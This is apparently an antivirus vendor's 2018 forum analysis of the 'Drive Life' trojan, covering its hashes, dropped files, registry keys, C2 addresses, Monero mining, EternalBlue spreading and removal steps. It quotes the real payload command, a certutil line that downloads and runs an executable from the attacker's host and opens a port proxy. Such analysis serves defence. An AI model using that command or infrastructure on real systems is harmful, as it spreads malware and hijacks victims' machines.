找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 137723|回复: 0

[已解决] “驱动人生”木马分析报告

 关闭 [复制链接]

主题

帖子

0

积分

版主

赤豹•泰山个人杀软QQ群:144195035

Rank: 7Rank: 7Rank: 7

积分
0
发表于 2018-12-17 20:25:23 | 显示全部楼层 |阅读模式
本帖最后由 lindeng19880211 于 2019-1-3 20:39 编辑

病毒名称  svhhost.exesvvhost.exesvhost.exe
MD5 74E2A43B2B7C6E258B3A3FC2516C1235
F79CB9D2893B254CC75DFB7F3E454A69
F673D848ACD2420BE364583646C9E607
编译时间:  2016.06.30 04:58:41(32位)
2016.06.30 04:59:18(32位)
2008.11.10 09:40:34(32位)
文件长度:  43,568    bytes(32位)
162,864   bytes(32位)
5,817,455  bytes(32位)
影响系统: Windows XP/Windows 7/Windows 8/Windows 10等

病毒介绍:
该样本是“驱动人生”旗下多款软件携带的后门病毒。该病毒进入电脑后,继续通过”永恒之蓝”高危漏洞进行全网传播。并回传被感染电脑的IP地址、CPU型号等信息。
目前病毒藏于电脑中进行挖矿,并等待其他模块的下载感染,利用“永恒之蓝”漏洞传播。该病毒主要通过“驱动人生”、”人生日历”、”USB宝盒”等软件传播病毒,病毒会同时执行两个任务:1、通过高危漏洞“永恒之蓝”快速传播,可使用户无感下大面积传播病毒。由于很多用户系统更新不及时,存在未修复的漏洞,因此受威胁也最大。2、下载svhhost.exe模块并且具有加载其他模块的功能,回传被感染电脑的IP地址、CPU型号、杀软等信息。3、通过云端控制收集中毒电脑部分信息,接受云端指令在中毒电脑进行门罗币挖矿。普通用户无需担心,江民杀毒软件第一时间已拦截该病毒。

以下是使用江民杀软拦截病毒的截图

  

  
文件系统变化:
1. 在C:\Windows\System32\或者C:\Windows\SysWOW64\目录下释放并启动PE文件svhost.exe和svhhost.exe。

  
注册表变化:
1. 创建注册表并设置键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svhost_RASMANCS和HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svhost_RASAPI32

  
网络症状:
1.  以上释放的PE文件主要访问了如下网址进行恶意程序的下载:
http://dl.haqo.net
http://dl.haqo.net/eb.exez
http://i.haqo.net
2、通过创建线程svvhost.exe加载内存中的代码进行挖矿,通信地址IP为:172.105.204.237
  
主要行为及详细分析:
病毒主要会释放2个PE文件svhost.exe和svhhost.exe,并且会下载一个svvhost.exe。下边详细分析svhost、svhhost及svvhost.exe。

  
svhost.exe详细分析:
1、病毒首先创建了一个服务并且服务指向了恶意代码,且创建服务的时候进行了其他的操作

2、查看并分析函数StartService(),函数内部先重启了模块,猜测是用于下载后模块进行更新。


3、然后将病毒文件svhost.exe拷贝病毒文件到C:\\windows\system32路径下


4、创建服务名为Ddrive的服务,创建失败做错误判断并输出日志


5、创建成功则对一些字符串初始化并更改服务配置,并开启服务


6、接着对服务进行分析,先注册了名为Ddriverd的服务,然后开启了一个线程

7、分析线程回调函数sub_40C3F0,病毒首先创建了名为"it is holy shit"的互斥体来判断是否已经运行


8、然后创建线程启动svhhonst.exe程序


9、接着开启一个线程判断是否有杀毒软件,如果有杀软则退出程序

[img=554,15][/img]

10、调用sub_408A40函数收集本机的信息,并发送至服务器


获取杀软状态



然后拼接URL发送到服务器


连接地址为:

http://i.haqo.net/i.png?ID=WIN-0 ... 07&BIT=32&CPU=Intel(R)%20Core(TM)%20i7-7700HQ%20CPU%20@%202.80GHz&CARD=VMware%20SVGA%203D&LI
  
11、然后进入恶意代码主体函数sub_40A460,并返回标记位,失败则退出svhost.exe


12、详细分析sub_40A460,样本先进行网络请求获取数据下载恶意代码,并存放在str_encode_cmd


13、然后解密控制指令

14、解密完控制指令,判断是不是.mlz文件类型,是则创建内存映像在内存中执行



  
15、判断解密完的文件是否是.exez,如果是则进行网络请求下载创建svvhost.exe




16、如果不是上边的两种类型,则存放在C:\\Windows\Temp目录下,并运行

至此svhost.exe主要功能分析完成,svhost.exe更像是一个代理程序,执行下载及重新加载,运行新下载文件等功能。

  
svhhost.exe详细分析:

  
17、svhhost该样本主要用于执行下载到内存中的恶意代码,样本判断互斥体的存在确定程序是否已经运行,然后根据系统是32位还是64位进行路径拼接,并开启线程运行svhost.exe,现在内存中的代码为门罗币挖矿程序。


18、最后加载并运行内存中的代码

17、内存中映射的名称是HSKALWOEDJSLALQEOD

19、判断是否加载进内存并执行shellcode,执行函数为check_pe_stat

Shellcode代码中带有xmring字段特征,为挖矿门罗币挖矿主要程序,可在GitHub上找到相关源码,Github相关地址:https://github.com/xmrig/xmrig

并且该程序后续还可加载其他代码进内存,进行恶意攻击。

该svhhost.exe相当于辅助模块,加载并运行内存中的恶意代码。

svvhost.exe详细分析:
子进程svvhost.exe主要是利用打包工具py2exe将python实现的“永恒之蓝”漏洞利用模块打包成exe程序

其中Mysmb.pyo为攻击时扫描代码

循环扫描内网的机器,并利用永恒之蓝的漏洞发送expliot攻击包,存在漏洞的机器会下载svhost.exe来达到感染传播的目的。

  
攻击成功后paylaod在中招机器执行以下命令进行内网扩散传播,下载svhost.exe母体病毒
cmd.exe /c certutil -urlcache -split -fhttp://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewalladd portopening tcp 65531 DNS&netsh interface portproxy add v4tov4listenport=65531 connectaddress=1.1.1.1 connectport=53

  
应对措施及建议:
  
针对此次木马的攻击,赤豹实验室专家提醒广大用户可及时采取以下措施进行防范:
1、“驱动人生”老版本用户应手动更新升级版本;
2、安装并及时更新江民杀毒软件,做好相关重要数据备份工作;
3、 及时打补丁修复永恒之蓝的漏洞,关闭445等端口(其他关联端口如: 135、137、139)的外部网络访问权限,在服务器上关闭不必要的上述服务端口;
4、服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
5、 关闭并删除服务Ddrive
6、 删除C:\Windows\System32\路径下的svhost.exe、svvhost.exe、svhhost.exe
7、 关闭进程svhost.exe、svvhost.exe、svhhost.exe

扫一扫了解最新安全资讯


热烈祝贺江民安全响应中心(JSRC)正式成立!
新江民人将不忘初心,牢记使命,努力践行社会责任,为国家的网络安全建设保驾护航!


微软2019 Windows 10更新五月版正式版将在5月下旬
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

官方微信| Archiver|手机版|江民论坛

GMT+8, 2019-5-22 19:56 , Processed in 1.089886 second(s), 20 queries .

北京江民新科技术有限公司 版权所有 X3.4

Copyright © 1996- jiangmin.com All Rights Reserved

快速回复 返回顶部 返回列表